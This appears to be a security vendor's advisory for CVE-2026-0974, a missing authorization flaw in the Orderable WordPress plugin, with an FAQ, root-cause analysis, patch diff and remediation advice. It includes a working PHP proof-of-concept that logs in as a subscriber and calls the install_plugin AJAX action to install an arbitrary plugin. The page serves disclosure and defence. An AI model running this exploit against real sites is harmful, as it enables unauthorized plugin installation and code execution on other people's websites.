What is CVE-2026-0974?

CVE-2026-0974 is a high-severity vulnerability in the Orderable plugin for WordPress, affecting versions up to 1.20.0. It allows authenticated users with Subscriber-level access to install arbitrary plugins due to a missing capability check in the install_plugin function.

How does this vulnerability work?

The vulnerability occurs because the install_plugin function does not verify user permissions or nonce security. An authenticated attacker can send a POST request to the admin-ajax.php endpoint with plugin installation details, allowing them to install any plugin without proper authorization.

Who is affected by this vulnerability?

Any WordPress site using the Orderable plugin version 1.20.0 or earlier is affected. Administrators should check their plugin version and update if necessary to ensure they are not vulnerable.

How can I check if my site is vulnerable?

To check if your site is vulnerable, verify the version of the Orderable plugin installed. If it is version 1.20.0 or earlier, your site is at risk. Additionally, review user roles to see if any users with Subscriber-level access or higher could exploit this vulnerability.

What should I do to fix this vulnerability?

The vulnerability has been patched in version 1.20.1 of the Orderable plugin. Administrators should immediately update to this version or later to mitigate the risk of exploitation.

What does a CVSS score of 8.8 indicate?

A CVSS score of 8.8 indicates a high level of severity, suggesting that the vulnerability poses significant risks to confidentiality, integrity, and availability. This means that successful exploitation can lead to severe consequences, such as remote code execution.

What are the implications of this vulnerability?

If exploited, this vulnerability allows attackers to install any plugin, potentially leading to remote code execution. Malicious plugins can execute arbitrary code with elevated permissions, compromising the entire WordPress site.

How does the proof of concept demonstrate the issue?

The proof of concept provided illustrates how an authenticated user can exploit the vulnerability by sending a crafted POST request to the vulnerable endpoint. It shows the steps required to authenticate and install a malicious plugin, highlighting the lack of security checks.

What security measures have been implemented in the patch?

The patch for CVE-2026-0974 adds two key security measures: it implements nonce verification to ensure requests are legitimate and checks user capabilities to confirm that only users with the ‘install_plugins’ permission can install plugins.

How can I further secure my WordPress installation?

To enhance security, regularly update all plugins and themes, use strong passwords, limit user roles, and implement security plugins that monitor for unauthorized changes. Additionally, consider regular security audits to identify and mitigate potential vulnerabilities.

What is the role of nonce verification in WordPress security?

Nonce verification is a security measure used in WordPress to protect against CSRF attacks. It ensures that requests made to sensitive actions, such as installing plugins, are intentional and originate from legitimate users.

What should I do if I suspect my site has been compromised?

If you suspect your site has been compromised, immediately disable the vulnerable plugin, change all user passwords, and conduct a thorough security audit. Restore from a clean backup if necessary and review logs for any unauthorized activity.

Atomic Edge Proof of Concept automated generator using AI diff analysis

Published : March 18, 2026

CVE-2026-0974: Orderable <= 1.20.0 – Missing Authorization to Authenticated (Subscriber+) Arbitrary Plugin Installation (orderable)

CVE ID CVE-2026-0974

Plugin orderable

Severity High (CVSS 8.8)

CWE 862

Vulnerable Version 1.20.0

Patched Version 1.20.1

Disclosed February 17, 2026

Analysis Overview

Atomic Edge analysis of CVE-2026-0974:
This vulnerability is a missing authorization flaw in the Orderable WordPress plugin’s plugin installation function. It allows authenticated users with Subscriber-level permissions or higher to install arbitrary plugins, potentially leading to remote code execution. The vulnerability affects all plugin versions up to and including 1.20.0.

Atomic Edge research identified the root cause in the `install_plugin` function within `/orderable/inc/vendor/iconic-onboard/inc/class-ajax.php`. The function lacked both a nonce verification and a capability check before processing plugin installation requests. The vulnerable code accepted POST data via the `plugin_data` parameter without validating the user’s permission to install plugins.

Exploitation requires an authenticated attacker with any valid WordPress user account. The attacker sends a POST request to `/wp-admin/admin-ajax.php` with the `action` parameter set to `install_plugin`. The request must include a `plugin_data` parameter containing the target plugin’s installation details. The AJAX endpoint processes this request without verifying the user’s `install_plugins` capability or checking a security nonce.

The patch adds two security measures. First, it implements `check_ajax_referer( ‘iconic-onboard’, ‘security’ )` to verify the request nonce. Second, it adds `if ( ! current_user_can( ‘install_plugins’ ) ) { wp_send_json_error(); }` to enforce the WordPress capability requirement. These changes ensure only users with administrative privileges can install plugins through this endpoint.

Successful exploitation grants attackers the ability to install any WordPress plugin. This directly leads to privilege escalation, as malicious plugins can execute arbitrary code with elevated permissions. Attackers can achieve remote code execution by installing a plugin containing backdoor functionality or by leveraging other plugin vulnerabilities. The CVSS score of 8.8 reflects the high impact on confidentiality, integrity, and availability.

Differential between vulnerable and patched code

Code Diff

--- a/orderable/inc/modules/location/class-location.php
+++ b/orderable/inc/modules/location/class-location.php
@@ -503,3 +503,12 @@
 		return apply_filters( 'orderable_location_get_selected_location_id', self::get_main_location_id() );
 	}
 }
+
+add_filter(
+	'iconic_ww_endpoints',
+	function( $endpoints ) {
+		// Index 1 is where the /find endpoint is declared in the array returned by get_endpoints().
+		array_splice( $endpoints, 1, 1 );
+		return $endpoints;
+	}
+);
 No newline at end of file
--- a/orderable/inc/vendor/iconic-onboard/inc/class-ajax.php
+++ b/orderable/inc/vendor/iconic-onboard/inc/class-ajax.php
@@ -109,6 +109,12 @@
 	 * @since  2.6.0
 	 */
 	public static function install_plugin() {
+		check_ajax_referer( 'iconic-onboard', 'security' );
+
+		if ( ! current_user_can( 'install_plugins' ) ) {
+			wp_send_json_error();
+		}
+
 		$plugin_data = (array) filter_input( INPUT_POST, 'plugin_data', FILTER_DEFAULT, FILTER_REQUIRE_ARRAY );

 		if ( empty( $plugin_data ) ) {
--- a/orderable/inc/vendor/wp-settings-framework/wp-settings-framework.php
+++ b/orderable/inc/vendor/wp-settings-framework/wp-settings-framework.php
@@ -982,10 +982,14 @@
 		 */
 		public function generate_toggle_field( $args ) {
 			$args['value'] = esc_attr( stripslashes( $args['value'] ) );
-			$checked       = ( $args['value'] ) ? 'checked="checked"' : '';

 			echo '<input type="hidden" name="' . esc_attr( $args['name'] ) . '" value="0" />';
-			echo '<label class="switch"><input type="checkbox" name="' . esc_attr( $args['name'] ) . '" id="' . esc_attr( $args['id'] ) . '" value="1" class="' . esc_attr( $args['class'] ) . '" ' . esc_html( $checked ) . '> ' . esc_html( $args['desc'] ) . '<span class="slider"></span></label>';
+			echo '<label class="switch">
+					<input type="checkbox" name="' . esc_attr( $args['name'] ) . '" id="' . esc_attr( $args['id'] ) . '" value="1" class="' . esc_attr( $args['class'] ) .
+					'" ' . checked( true, (bool) $args['value'], false ) . '> ' .
+					'<span class="slider"></span>
+				</label>';
+			echo '<span class="wpsf-description wpsf-toggle-field-description">' . esc_html( $args['desc'] ) . '</span>';
 		}

 		/**
--- a/orderable/orderable.php
+++ b/orderable/orderable.php
@@ -3,11 +3,11 @@
  * Plugin Name: Orderable - Local Ordering System
  * Author URI: https://orderable.com
  * Description: Take local online ordering to a whole new level with Orderable.
- * Version: 1.20.0
+ * Version: 1.20.1
  * Author: Orderable
  * Text Domain: orderable
  * WC requires at least: 5.4.0
- * WC tested up to: 10.4
+ * WC tested up to: 10.5.2
  * Requires PHP: 7.4
  */

@@ -20,7 +20,7 @@
 	/**
 	 * @var string Plugin version.
 	 */
-	public static $version = '1.20.0';
+	public static $version = '1.20.1';

 	/**
 	 * @var string Required pro version.

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

PHP PoC

// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept
// CVE-2026-0974 - Orderable <= 1.20.0 - Missing Authorization to Authenticated (Subscriber+) Arbitrary Plugin Installation

<?php
/**
 * Proof of Concept for CVE-2026-0974
 * Requires valid WordPress subscriber credentials
 * Targets the vulnerable install_plugin AJAX endpoint
 */

$target_url = 'http://vulnerable-wordpress-site.com';
$username = 'subscriber_user';
$password = 'subscriber_password';
$plugin_slug = 'malicious-plugin'; // Slug of plugin to install

// Step 1: Authenticate to WordPress
$login_url = $target_url . '/wp-login.php';
$login_data = array(
    'log' => $username,
    'pwd' => $password,
    'wp-submit' => 'Log In'
);

$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $login_url);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($login_data));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_COOKIEJAR, 'cookies.txt');
curl_setopt($ch, CURLOPT_COOKIEFILE, 'cookies.txt');
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
$response = curl_exec($ch);

// Step 2: Exploit the missing authorization in install_plugin function
$ajax_url = $target_url . '/wp-admin/admin-ajax.php';
$exploit_data = array(
    'action' => 'install_plugin',
    'plugin_data[slug]' => $plugin_slug,
    'plugin_data[source]' => 'wordpress' // Can be 'wordpress' or 'url' for direct download
);

curl_setopt($ch, CURLOPT_URL, $ajax_url);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($exploit_data));
$ajax_response = curl_exec($ch);
curl_close($ch);

// Step 3: Check response
if (strpos($ajax_response, 'success') !== false) {
    echo "[+] Plugin installation attempted. Check WordPress admin for status.n";
    echo "[+] Response: " . $ajax_response . "n";
} else {
    echo "[-] Exploit may have failed. Response: " . $ajax_response . "n";
}

unlink('cookies.txt');
?>

Frequently Asked Questions

What is CVE-2026-0974?
Overview of the vulnerability
CVE-2026-0974 is a high-severity vulnerability in the Orderable plugin for WordPress, affecting versions up to 1.20.0. It allows authenticated users with Subscriber-level access to install arbitrary plugins due to a missing capability check in the install_plugin function.
How does this vulnerability work?
Mechanism of exploitation
The vulnerability occurs because the install_plugin function does not verify user permissions or nonce security. An authenticated attacker can send a POST request to the admin-ajax.php endpoint with plugin installation details, allowing them to install any plugin without proper authorization.
Who is affected by this vulnerability?
Identifying vulnerable installations
Any WordPress site using the Orderable plugin version 1.20.0 or earlier is affected. Administrators should check their plugin version and update if necessary to ensure they are not vulnerable.
How can I check if my site is vulnerable?
Steps for verification
To check if your site is vulnerable, verify the version of the Orderable plugin installed. If it is version 1.20.0 or earlier, your site is at risk. Additionally, review user roles to see if any users with Subscriber-level access or higher could exploit this vulnerability.
What should I do to fix this vulnerability?
Updating the plugin
The vulnerability has been patched in version 1.20.1 of the Orderable plugin. Administrators should immediately update to this version or later to mitigate the risk of exploitation.
What does a CVSS score of 8.8 indicate?
Understanding the severity rating
A CVSS score of 8.8 indicates a high level of severity, suggesting that the vulnerability poses significant risks to confidentiality, integrity, and availability. This means that successful exploitation can lead to severe consequences, such as remote code execution.
What are the implications of this vulnerability?
Potential risks
If exploited, this vulnerability allows attackers to install any plugin, potentially leading to remote code execution. Malicious plugins can execute arbitrary code with elevated permissions, compromising the entire WordPress site.
How does the proof of concept demonstrate the issue?
Exploit demonstration
The proof of concept provided illustrates how an authenticated user can exploit the vulnerability by sending a crafted POST request to the vulnerable endpoint. It shows the steps required to authenticate and install a malicious plugin, highlighting the lack of security checks.
What security measures have been implemented in the patch?
Improvements in version 1.20.1
The patch for CVE-2026-0974 adds two key security measures: it implements nonce verification to ensure requests are legitimate and checks user capabilities to confirm that only users with the ‘install_plugins’ permission can install plugins.
How can I further secure my WordPress installation?
Best practices for security
To enhance security, regularly update all plugins and themes, use strong passwords, limit user roles, and implement security plugins that monitor for unauthorized changes. Additionally, consider regular security audits to identify and mitigate potential vulnerabilities.
What is the role of nonce verification in WordPress security?
Importance of nonce checks
Nonce verification is a security measure used in WordPress to protect against CSRF attacks. It ensures that requests made to sensitive actions, such as installing plugins, are intentional and originate from legitimate users.
What should I do if I suspect my site has been compromised?
Response to potential exploitation
If you suspect your site has been compromised, immediately disable the vulnerable plugin, change all user passwords, and conduct a thorough security audit. Restore from a clean backup if necessary and review logs for any unauthorized activity.

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations